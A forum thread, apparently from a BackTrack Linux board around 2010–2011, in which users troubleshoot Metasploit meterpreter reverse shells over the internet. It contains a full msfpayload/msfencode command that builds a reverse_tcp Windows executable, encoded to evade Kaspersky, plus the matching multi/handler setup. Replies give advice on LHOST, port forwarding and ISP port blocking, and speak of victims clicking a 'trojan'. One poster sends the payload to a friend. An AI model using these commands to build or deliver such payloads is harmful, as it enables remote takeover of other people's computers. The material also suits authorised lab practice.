Try setting your LHOST to your internal IP if you have done the port forwarding.
I'am try to create a test situation where i sploit someone via the internet. To do so, i have 2 computers (1 victim and 1 attacker) all based on two different connection and i generate a simple meterpreter.exe + handler on my backtrackbox and the windows victim will stupidly double click on my .exe
It's really just for trying purpose and it even doesn't work.
So this is what i do :
1. On my Backtrackbox ( 192.168.1.2 // 220.127.116.11 ) I generate the meterpreter and encode-it to bypass Kaspersky
2. Then still on my backtrackbox, I'am opening the handler to recept the reverse from the victim when he will doubleclick itCode:./msfpayload windows/meterpreter/reverse_tcp LHOST=18.104.22.168 LPORT=8080 R | ./msfencode -e php/base64 -c 6 -t raw | ./msfencode -e x86/shitaka_ga_nai -c 20 -t exe > /root/binaries/final.exe
Code:msf> use exploit/multi/handler msf> set PAYLOAD windows/meterpreter/reverse_tcp msf> set LHOST 22.214.171.124 msf> set LPORT 8080 msf> exploit [-] Handler failed to bind to 126.96.36.199:8080 // I guess this isn't really an issue since it just "listen" to the victim connexion, so the local IP should be fine.. right ? [*] Started reverse handler on 0.0.0.0:8080 [*] Starting the payload handler...
3.Everything seems ok to me so far. Now i'm going to get the .exe and run it to my box
And it's here that everything seems to fail. I don't know why. I tryied without antivirus, my NAT are correct, my port-forwarding is setup and ready to forward...
I just double click on the exe, a window pop 1 sec and then nothing. The handler doesn't move and the meterpreter doesn't seems to work.
The windows box (victim) is a Windows 7 machine.
Am i missing something ? I did something wrong ?
Last edited by 0megear; 07-07-2010 at 07:47 PM.
I don't know what i'am doing wrong but it is not working.
My victim computer is a Windows 7 (build 7600, unlicensed) without firewall and antivirus. The meterpreter is double clicked, a cmd.exe show.. and then nothing. No handler when i take a look on my backtrack computer. I tryied without encode and it still doesn't work.
What is strange about it, is that it seem to have random result. During my test, the meterpreter.exe on the victim was popping 1 sec then disappearing and when i generated the exact same meterpreter 15 min later, the cmd.exe was just here opnened without disappearing.
I must do something wrong but i double checked everything and i just don't get it.
Digging up old topics, I know, but I am posting this just in case someone have encounter the same error and needs help.
The LHOST should be your backtrack box IP, not the victim IP.
It should start with 172.x.x.x or 192.168.x.x.x
After you enter exploit, the victim have to click on the exe file you created to be exploited
For your understanding, the LHOST (aka Listening Host) should be YOU, or a server you are connected to and is listening for ANY connection from the victim. RHOST (aka Remote Host) will be the victim IP. Therefore in any TROJAN you created, you should always set the LISTENING HOST to YOU, so that any victim clicks on the exe when you are listening victim would allow the trojan to work.
i would look for the stager(payload you generated) exe in windows task manager to see it if is running or just opens then closes. Or perhaps try using netstat in windows to observe outbound tcp/ip connections. To test if the port forwarding is setup correctly for handler, you can browse to 188.8.131.52:8080 from windows box and watch if handler responds in any way
I have a problem with Metasploit outside lan ..
1-forward the port 4444 of my router,
2-disable the firewall on my pc
3-create the payload windows / meterpreter / reverse_tcp LHOST with (my ip no-ip), LHPORT = 4444
use exploit / multi / handler
September PAYLOAD windows / meterpreter / reverse_tcp
September LHOST (my internal ip)
LPORT September 4444
5-send the payload, my friend opens it and nothing happens ..
what's the problem? within the LAN works ..
many ISPs block port 4444. We do(i work for one). Try it on another port
Running both KDE and GNOME BT5 flawlessly. Thank you !
Last edited by iproute; 03-29-2011 at 11:05 PM.